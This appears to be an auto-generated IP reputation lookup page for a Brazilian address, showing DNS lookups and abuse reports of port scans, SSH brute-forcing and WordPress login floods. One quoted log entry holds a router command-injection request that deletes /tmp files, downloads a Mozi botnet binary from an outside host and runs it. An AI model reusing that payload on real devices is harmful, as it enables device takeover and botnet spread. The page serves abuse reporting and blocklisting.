45.162.99.142 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Brazil

Internet Service Provider: Delha Barbosa de Carvalho - ME

Hostname: unknown

Organization: unknown

Usage Type: Commercial

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	Automatic report - Port Scan Attack	2019-11-22 16:17:12

Comments on same subnet:

IP	Type	Details	Datetime
45.162.99.139	attackspam	1593057236 - 06/25/2020 10:53:56 Host: 45.162.99.139/45.162.99.139 Port: 23 TCP Blocked ...	2020-06-25 14:54:26
45.162.99.11	attackspambots	Automatic report - Port Scan Attack	2020-04-24 18:00:49
45.162.99.32	attackspam	20/4/23@23:57:22: FAIL: Alarm-Telnet address from=45.162.99.32 ...	2020-04-24 12:48:26
45.162.99.212	attack	Automatic report - Port Scan Attack	2020-02-12 02:57:25
45.162.99.74	attack	port scan and connect, tcp 23 (telnet)	2019-12-08 17:38:03
45.162.99.106	attack	port scan/probe/communication attempt; port 23	2019-12-02 07:53:54
45.162.99.50	attackspambots	UTC: 2019-11-30 port: 26/tcp	2019-12-01 18:00:57
45.162.99.223	attack	UTC: 2019-11-30 port: 23/tcp	2019-12-01 16:29:09
45.162.99.108	attackspam	Automatic report - Port Scan Attack	2019-11-29 09:17:06
45.162.99.188	attack	Automatic report - Port Scan Attack	2019-11-27 02:28:04
45.162.99.111	attackspam	Automatic report - Port Scan Attack	2019-11-22 16:34:08
45.162.99.126	attackspambots	Automatic report - Port Scan Attack	2019-11-15 18:18:01

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.162.99.142
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28056
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;45.162.99.142.			IN	A

;; AUTHORITY SECTION:
.			539	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019112101 1800 900 604800 86400

;; Query time: 99 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Nov 22 16:17:06 CST 2019
;; MSG SIZE  rcvd: 117

Host info

142.99.162.45.in-addr.arpa domain name pointer 45.162.99-142.grupoleontelecom.com.br.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
142.99.162.45.in-addr.arpa	name = 45.162.99-142.grupoleontelecom.com.br.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
49.233.79.168	attackspambots	Invalid user deploy from 49.233.79.168 port 32834	2020-10-02 01:56:38
60.220.185.22	attackbots	Oct 1 19:05:04 haigwepa sshd[5886]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.220.185.22 Oct 1 19:05:06 haigwepa sshd[5886]: Failed password for invalid user jk from 60.220.185.22 port 35754 ssh2 ...	2020-10-02 02:11:26
61.151.130.20	attackspam	Oct 1 12:26:21 sip sshd[1785731]: Invalid user web from 61.151.130.20 port 8359 Oct 1 12:26:22 sip sshd[1785731]: Failed password for invalid user web from 61.151.130.20 port 8359 ssh2 Oct 1 12:30:21 sip sshd[1785737]: Invalid user christian from 61.151.130.20 port 28956 ...	2020-10-02 01:31:57
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-02 01:42:57
1.196.238.130	attackspam	Oct 1 11:19:26 hosting sshd[30004]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.196.238.130 user=admin Oct 1 11:19:27 hosting sshd[30004]: Failed password for admin from 1.196.238.130 port 37344 ssh2 ...	2020-10-02 02:05:41
101.99.15.57	attack	101.99.15.57 - - [01/Oct/2020:16:52:37 +0100] "POST /wp-login.php HTTP/1.1" 200 2348 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 101.99.15.57 - - [01/Oct/2020:16:52:40 +0100] "POST /wp-login.php HTTP/1.1" 200 2332 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 101.99.15.57 - - [01/Oct/2020:16:52:43 +0100] "POST /wp-login.php HTTP/1.1" 200 2335 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-10-02 01:57:42
157.230.109.166	attackbotsspam	Invalid user odoo from 157.230.109.166 port 37968	2020-10-02 01:49:18
2405:2840:0:5:216:3eff:fea8:a8a8	attackbotsspam	Oct 1 02:25:29 lavrea wordpress(yvoictra.com)[93232]: Authentication attempt for unknown user admin from 2405:2840:0:5:216:3eff:fea8:a8a8 ...	2020-10-02 01:52:48
159.89.49.238	attack	159.89.49.238 (US/United States/-), 6 distributed sshd attacks on account [root] in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_DISTATTACK; Logs: Oct 1 19:28:46 server sshd[661]: Failed password for root from 116.228.233.91 port 59700 ssh2 Oct 1 19:28:44 server sshd[661]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.228.233.91 user=root Oct 1 19:41:30 server sshd[2722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=159.89.49.238 user=root Oct 1 19:38:07 server sshd[2180]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.225.85 user=root Oct 1 19:28:09 server sshd[592]: Failed password for root from 160.251.15.58 port 56900 ssh2 Oct 1 19:38:09 server sshd[2180]: Failed password for root from 206.189.225.85 port 47452 ssh2 IP Addresses Blocked: 116.228.233.91 (CN/China/-)	2020-10-02 01:48:01
31.207.47.76	attack	$f2bV_matches	2020-10-02 01:55:29
203.183.68.135	attack	Invalid user backup2 from 203.183.68.135 port 43130	2020-10-02 01:40:58
101.96.113.50	attack	Brute-force attempt banned	2020-10-02 02:01:31
171.6.136.242	attackbots	Oct 1 14:20:39 inter-technics sshd[14868]: Invalid user admin from 171.6.136.242 port 48818 Oct 1 14:20:39 inter-technics sshd[14868]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=171.6.136.242 Oct 1 14:20:39 inter-technics sshd[14868]: Invalid user admin from 171.6.136.242 port 48818 Oct 1 14:20:41 inter-technics sshd[14868]: Failed password for invalid user admin from 171.6.136.242 port 48818 ssh2 Oct 1 14:22:33 inter-technics sshd[14964]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=171.6.136.242 user=root Oct 1 14:22:34 inter-technics sshd[14964]: Failed password for root from 171.6.136.242 port 47620 ssh2 ...	2020-10-02 02:07:05
51.254.75.176	attackspambots	Found on CINS badguys / proto=6 . srcport=55364 . dstport=8443 . (2172)	2020-10-02 01:36:30
114.99.130.129	attackbots	Brute forcing email accounts	2020-10-02 01:44:05

Recently Reported IPs

244.242.192.221	62.224.161.122	237.163.239.49	48.229.189.255
44.69.100.47	86.156.247.227	2001:4cc8:1:1:250:56ff:fe8d:ba40	45.146.203.169
58.17.246.139	201.163.229.234	111.68.101.167	62.210.207.246
45.162.99.111	203.210.192.225	71.166.171.50	198.109.73.234
179.189.190.166	180.124.29.70	200.56.31.112	116.111.65.31